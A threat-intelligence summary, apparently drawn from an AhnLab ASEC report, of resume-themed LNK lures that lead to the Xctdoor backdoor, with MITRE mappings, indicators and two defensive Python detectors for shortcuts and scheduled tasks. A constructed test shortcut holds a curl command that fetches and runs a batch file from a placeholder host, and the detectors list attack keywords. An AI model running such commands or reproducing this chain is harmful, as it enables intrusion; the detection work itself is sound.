It looks like a normal resume, but the infection begins the moment it is opened.

Malicious LNK shortcut files disguised as resume documents are being used to trick corporate users into opening what looks like a legitimate file, which instead launches a hidden infection chain. The chain drops batch, PowerShell and VBScript files, establishes persistence through Task Scheduler and the Startup folder, uses DLL side-loading, and ultimately runs the Xctdoor backdoor, which then communicates with a C2 server.

Keypoints

  • Threat actors are distributing malicious .LNK files disguised as resume documents with company names and job titles in the filenames.
  • When opened, the LNK file shows a legitimate decoy resume document to reduce suspicion while malicious code runs in the background.
  • The attack creates batch, PowerShell, and VBScript files in C:\Users\Public\Videos and chains them so that each script launches the next stage.
  • A scheduled task named office365 is registered to run a VBScript every 10 minutes, helping the attack persist after reboot or process termination.
  • Additional files are downloaded with curl, Base64-decoded, and assembled into the components ProximityUxHost.exe, ProximityCommon.DLL, settings.dat, and MicrosoftBing.LNK.
  • The malware uses DLL side-loading to inject the backdoor Xctdoor from settings.dat into a legitimate process and attempts communication with an external C2 server.
  • Defenders are advised to inspect Task Scheduler entries and to delete suspicious files under the Microsoft.BingSearch365 package path and the user's Startup folder.
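The lure in the first two key points can be triaged before anyone opens it. The script below is an added example (it is not code from the ASEC report) that parses the fixed header and the StringData section of a Shell Link file, as laid out in MS-SHLLINK, and lists the traits that make a shortcut a document-themed lure: a document-like filename, a target that is a script host, a command line with download or script-dropping keywords, a console window set to start minimised, and an icon borrowed from another binary. The sample shortcut, its filename, the `example.invalid` URL, the argument string and the benign Notepad shortcut are all constructed here for illustration; the parser skips the LinkTargetIDList and LinkInfo structures instead of decoding the absolute target, so a lure that carries only an ID list (no relative path) needs a fuller parser.

```python
"""Triage a Windows .LNK for the traits of a document-themed lure shortcut.

Added example, not code from the ASEC report. Sample bytes are constructed
below so the script runs offline; the parser follows the MS-SHLLINK
ShellLinkHeader and StringData layout.
"""
import struct
from pathlib import PureWindowsPath

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK 2.1.1); StringData fields appear in this order.
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWNORMAL, SW_SHOWMINNOACTIVE = 1, 7      # 7 = console window starts minimised

SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe", "curl.exe"}
DOC_EXTS = {".pdf", ".doc", ".docx", ".hwp", ".xls", ".xlsx", ".txt"}
SUSPICIOUS_ARGS = ("curl", "powershell", "schtasks", "certutil", "-enc", "hidden",
                   "\\users\\public\\", "%public%", ".vbs", ".bat", ".ps1")


def parse_lnk(data: bytes) -> dict:
    """Return the header fields and StringData strings of a Shell Link."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (bad HeaderSize or CLSID)")
    flags = struct.unpack_from("<I", data, 20)[0]
    icon_index, show_cmd = struct.unpack_from("<iI", data, 56)
    pos = 76
    if flags & HAS_ID_LIST:                     # skip LinkTargetIDList: IDListSize + items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                   # skip LinkInfo: LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]

    def read_string() -> str:                   # CountCharacters, then an unterminated string
        nonlocal pos
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + width * count]
        pos += width * count
        return raw.decode("utf-16-le") if width == 2 else raw.decode("cp1252", "replace")

    info = {"flags": flags, "icon_index": icon_index, "show_command": show_cmd}
    for bit, key in ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"), (HAS_WORKDIR, "working_dir"),
                     (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location")):
        info[key] = read_string() if flags & bit else ""
    return info


def triage(filename: str, info: dict) -> list:
    """Return the reasons a shortcut looks like a document-themed lure (empty if none)."""
    reasons = []
    stem = PureWindowsPath(filename).stem.lower()           # drops the trailing .lnk
    if PureWindowsPath(stem).suffix in DOC_EXTS or "resume" in stem:
        reasons.append("document-like filename")
    target = PureWindowsPath(info["relative_path"]).name.lower()
    if target in SCRIPT_HOSTS:
        reasons.append(f"target is a script host: {target}")
    args = info["arguments"].lower()
    hits = [k for k in SUSPICIOUS_ARGS if k in args]
    if hits:
        reasons.append("suspicious arguments: " + ", ".join(hits))
    if len(info["arguments"]) > 200:
        reasons.append(f"unusually long command line ({len(info['arguments'])} chars)")
    if info["show_command"] == SW_SHOWMINNOACTIVE and target in SCRIPT_HOSTS:
        reasons.append("console window starts minimised")
    icon = PureWindowsPath(info["icon_location"]).name.lower()
    if icon and icon != target and target in SCRIPT_HOSTS:
        reasons.append(f"icon borrowed from another binary: {icon}")
    return reasons


def build_sample_lnk(relative_path, working_dir, arguments, icon_location, show_cmd=SW_SHOWNORMAL) -> bytes:
    """Constructed sample: a minimal Shell Link carrying only StringData (no ID list, no LinkInfo)."""
    flags = IS_UNICODE | HAS_REL_PATH | HAS_WORKDIR | HAS_ARGS | HAS_ICON
    header = struct.pack("<I16sIIQQQIiIHHII", 0x4C, LNK_CLSID, flags, 0x20,  # 0x20 = FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0, 0, 0, show_cmd, 0, 0, 0, 0)
    body = b""
    for text in (relative_path, working_dir, arguments, icon_location):
        body += struct.pack("<H", len(text)) + text.encode("utf-16-le")
    return header + body


# Constructed samples: names, paths and URL are invented for illustration.
SAMPLE_NAME = "(RESUME)_Example Corp_Software Engineer.pdf.lnk"
SAMPLE_LNK = build_sample_lnk(
    relative_path="..\\..\\..\\Windows\\System32\\cmd.exe",
    working_dir="C:\\Windows\\System32",
    arguments="/c curl -o %PUBLIC%\\Videos\\r.bat http://example.invalid/r && %PUBLIC%\\Videos\\r.bat",
    icon_location="C:\\Windows\\System32\\imageres.dll",
    show_cmd=SW_SHOWMINNOACTIVE,
)
BENIGN_LNK = build_sample_lnk("..\\..\\Windows\\notepad.exe", "C:\\Windows", "", "C:\\Windows\\notepad.exe")

if __name__ == "__main__":
    for fname, blob in ((SAMPLE_NAME, SAMPLE_LNK), ("Notepad.lnk", BENIGN_LNK)):
        print(fname, "->", triage(fname, parse_lnk(blob)) or ["no findings"])
```

Run it against a directory of quarantined shortcuts with `parse_lnk(Path(p).read_bytes())`; any shortcut that scores a script-host target together with a document-like name is worth a manual look regardless of the other heuristics, since those two alone are the whole trick the report describes.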

MITRE Techniques

  • [T1204.002] User Execution: Malicious File – The attack depends on users opening a disguised LNK resume file to start the infection chain (‘executing an LNK file disguised as a resume’).
  • [T1036] Masquerading – Threat actors name files to look like legitimate resume documents and use a task name that resembles a business service (‘name the files to resemble resume documents’; ‘name “office365”’).
  • [T1053.005] Scheduled Task/Job: Scheduled Task – A PowerShell script registers a Task Scheduler job named office365 to run a VBScript every 10 minutes (‘registers a Task Scheduler job named “office365”’).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell scripts are created and executed as part of the malware chain (‘PowerShell scripts (.ps1) … the newly created PowerShell script is subsequently executed’).
  • [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Batch files (.bat) are created and executed to continue the attack flow (‘batch files (.bat) … are created’; ‘the VBScript file then executes a batch file’).
  • [T1059.005] Command and Scripting Interpreter: Visual Basic – VBScript files (.vbs) are used to execute the batch file and maintain the chain (‘VBScript files (.vbs) … the VBScript file then executes a batch file’).
  • [T1105] Ingress Tool Transfer – Additional files are downloaded from an external server using curl (‘uses the `curl` command to download additional files from an external server’).
  • [T1027] Obfuscated Files or Information – Downloaded files are Base64-encoded and later decoded before use (‘Some of the downloaded files are encoded in Base64’).
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – The malware creates a shortcut in the Startup path to ensure persistence (‘creates a shortcut on the Startup path’).
  • [T1574.002] Hijack Execution Flow: DLL Side-Loading – Legitimate executables load malicious DLLs to run the payload (‘DLL side-loading technique was used’; ‘ProximityCommon.dll was loaded’).
  • [T1055] Process Injection – The backdoor Xctdoor is injected into a legitimate process after DLL loading (‘the backdoor malware Xctdoor … was injected into the legitimate process’).
  • [T1071.001] Application Layer Protocol: Web Protocols – The malware attempts to communicate with an external C2 server over network protocols (‘attempted to communicate with a specific external C2 server’).
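The T1053.005 entry above and the remediation advice in the key points both come down to one hunt: find a task that re-runs a script host on a short repetition interval against a script sitting in a world-writable folder. The function below is an added example, not code from the ASEC report, that applies that logic to Task Scheduler definitions in the XML form Windows keeps under C:\Windows\System32\Tasks (and that `schtasks /Query /XML` exports), so it can run offline over files collected from a host. The two task documents, the `\office365` and defrag task names, the paths inside them, and the 15-minute threshold are constructed or assumed here for illustration; the report states only that the real task fires every 10 minutes.

```python
"""Flag Task Scheduler definitions that match the office365-style persistence.

Added example, not code from the ASEC report. The two task documents below
are constructed for illustration; their layout follows the XML that Windows
keeps under C:\\Windows\\System32\\Tasks and that `schtasks /Query /XML` exports.
"""
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe",
                "cmd.exe", "mshta.exe", "rundll32.exe"}
PUBLIC_DIRS = ("\\users\\public\\", "%public%", "\\programdata\\", "\\appdata\\local\\temp\\")
MAX_INTERVAL_MIN = 15          # assumed threshold: legitimate tasks rarely repeat this often


def iso_duration_minutes(value):
    """Convert a Repetition/Interval such as PT10M or PT1H30M to minutes (None if malformed)."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", value or "")
    if not m:
        return None
    days, hours, mins, secs = (int(x) if x else 0 for x in m.groups())
    return days * 1440 + hours * 60 + mins + secs / 60


def inspect_task(xml_text):
    """Return (task URI, list of findings) for one task definition."""
    root = ET.fromstring(xml_text)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="?", namespaces=NS)
    findings = []
    intervals = [iso_duration_minutes(e.text) for e in root.findall(".//t:Repetition/t:Interval", NS)]
    short = [i for i in intervals if i is not None and i <= MAX_INTERVAL_MIN]
    if short:
        findings.append(f"repeats every {min(short):g} min")
    for ex in root.findall("t:Actions/t:Exec", NS):
        cmd = ex.findtext("t:Command", default="", namespaces=NS).strip().strip('"')
        args = ex.findtext("t:Arguments", default="", namespaces=NS).strip()
        exe = cmd.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if exe in SCRIPT_HOSTS:
            findings.append(f"action runs script host {exe}")
        line = f"{cmd} {args}".lower()
        if any(p in line for p in PUBLIC_DIRS):
            findings.append("command line points into a public or temp folder")
        if re.search(r"\.(vbs|bat|cmd|ps1|js)\b", line):
            findings.append("command line references a script file")
    return uri, findings


def hunt(task_docs):
    """Return {uri: findings} for every task definition that triggers at least one finding."""
    hits = {}
    for doc in task_docs:
        uri, findings = inspect_task(doc)
        if findings:
            hits[uri] = findings
    return hits


# Constructed sample: shaped like the task the report describes, with invented paths.
SUSPECT_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\office365</URI></RegistrationInfo>
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT10M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2024-01-01T00:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>wscript.exe</Command><Arguments>//B C:\\Users\\Public\\Videos\\update.vbs</Arguments></Exec>
  </Actions>
</Task>"""

# Constructed sample: a weekly maintenance task with no repetition and a native binary.
BENIGN_TASK_XML = """<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\\Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI></RegistrationInfo>
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2024-01-01T01:00:00</StartBoundary>
      <ScheduleByWeek><WeeksInterval>1</WeeksInterval><DaysOfWeek><Wednesday/></DaysOfWeek></ScheduleByWeek>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>%windir%\\system32\\defrag.exe</Command><Arguments>-c -h -k -g</Arguments></Exec>
  </Actions>
</Task>"""

if __name__ == "__main__":
    for uri, findings in hunt([SUSPECT_TASK_XML, BENIGN_TASK_XML]).items():
        print(uri, "->", "; ".join(findings))
```

On a live host, feed `hunt()` the output of `schtasks /Query /XML ONE` or the files under C:\Windows\System32\Tasks (they are UTF-16 with a BOM, so read them with `encoding="utf-16"`); a task that combines the short interval with a script host and a public folder is the pattern to pull, while a single finding on its own is usually an administrator's scheduled script.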

Indicators of Compromise

  • [File names] malicious and generated files – (RESUME)_Korea Company Name_Job Title_***.LNK, MicrosoftBing.LNK
  • [File paths] script and payload locations – C:\Users\Public\Videos, C:\Users\Public\Pictures\p2.ps1
  • [File names] dropped executable and support files – ProximityUxHost.exe, ProximityCommon.DLL, settings.dat
  • [Scheduled task name] persistence artifact – office365
  • [User profile path] suspicious package location – C:\Users\{User}\AppData\Local\Packages\Microsoft.BingSearch365_8wekyb3d8bbwe\AppData
  • [External server / C2] download and command endpoint context – external download server via curl, specific external C2 server for Xctdoor


Read more: https://asec.ahnlab.com/en/94165/